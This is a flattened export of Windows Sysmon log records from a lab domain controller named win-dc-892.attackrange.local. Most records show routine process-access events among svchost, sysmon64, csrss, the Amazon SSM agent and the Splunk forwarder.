10341000x80000000000000002243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.958{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.958{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.958{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-647D-6064-2D00-00000000AE01}23643376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5d95e 154100x80000000000000002232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.397{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe-----"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=532894851130E19A62E811A3C7E2B6A6,SHA256=950F8FCDD05F9DD8D1C9E4C9B6D7D18644F662683A1942BD70B1028FA595119C,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{266CAFBE-647D-6064-2D00-00000000AE01}2364C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000002231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.924{266CAFBE-647E-6064-4700-00000000AE01}40204024C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.908{266CAFBE-647E-6064-4400-00000000AE01}39443976C:\Windows\system32\wbem\wmiprvse.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\combase.dll+a8a02|C:\Windows\System32\combase.dll+a972e|C:\Windows\System32\combase.dll+a953f|C:\Windows\System32\combase.dll+45458|C:\Windows\System32\combase.dll+45070|C:\Windows\System32\combase.dll+520a7|C:\Windows\System32\combase.dll+c2274|C:\Windows\System32\combase.dll+4f0e1|C:\Windows\System32\combase.dll+508c0|C:\Windows\System32\combase.dll+21ba|C:\Windows\System32\RPCRT4.dll+d97da|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000002229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 